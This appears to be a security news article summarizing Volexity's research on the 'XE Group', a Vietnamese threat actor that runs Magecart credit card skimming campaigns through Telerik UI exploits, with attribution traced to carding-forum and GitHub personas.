The ‘XE Group,’ a relatively obscure gang of Vietnamese hackers, has been tied to commercial hacking and credit card skimming for eight years. Threat actors are suspected of stealing thousands of credit cards each day, mostly from restaurants, non-profit organizations, art galleries, and travel websites.
The actors hack externally-facing services using publicly accessible exploits, most notably Telerik UI weaknesses, to install password and payment information stealing malware. The group’s operations were initially detailed in a 2020 Malwarebytes report, but Volexity provided a more in-depth study of recent breaches ascribed to them.
Volexity was able to trace the XE Group’s infrastructure over the past three years and publish all technical information and IOCs on GitHub. Due to a popular approach for loading malicious JavaScript snippets, the researchers could locate a large number of compromised sites all carrying the same skimmer.
According to the Volexity analysis, the code used to load the malicious JavaScript from this website indicates that the attacker employs an innovative technique: the JavaScript keyword “object” is used to populate the domain value.
These are known as “Magecart” attacks, which occur when a threat actor compromises an eCommerce site and inserts malicious JavaScript that captures customer and payment information as it is entered. The stolen data is then transmitted to a remote site, where the attackers may gather it.
The long-term success of these cyberattacks is determined by how effectively they can remain undetected on a website by security software. When this skimmer’s sample is uploaded to VirusTotal, it receives a perfect 0/57 detection score, indicating that this group’s JavaScript is highly resistant to AV detection.
The current skimmer has minor enhancements over last year’s samples and continues to steal any data victims type onto pages that include malicious JavaScript. Because some of the domain names used for command-and-control servers are registered to a person in Vietnam, Volexity ties the XE Group’s activity to Vietnamese threat actors. Although domain registration information may be forged, the researchers could link the registrant, Joe Nguyen, to a GitHub repository using an XE avatar generated by someone with the same name.
Additionally, the GitHub repository’s nickname “xethanh” had an account on the crdclub[.]su forum, where they sold stolen credit card information. Similar accounts were discovered on other carding communities, such as cybercarders[.]su and cardingforum[.]co, indicating that the actor prefers to sell the cards rather than use them.
Volexity explains that “The persona used for the GitHub and carding account, and several of the domains, have a history going back to 2013, which suggests the attacker may have been attempting similar attacks for up to eight years, with only one significant public mention of their activity.”
Finally, it appears that Vietnamese individuals uploaded some of the malicious files found by VirusTotal. Before initiating a campaign, threat actors generally employ VirusTotal to see how effectively antivirus products can identify their malware. Defenders can use the offered network indicators to stop XE Group operations or use these signatures to detect the danger.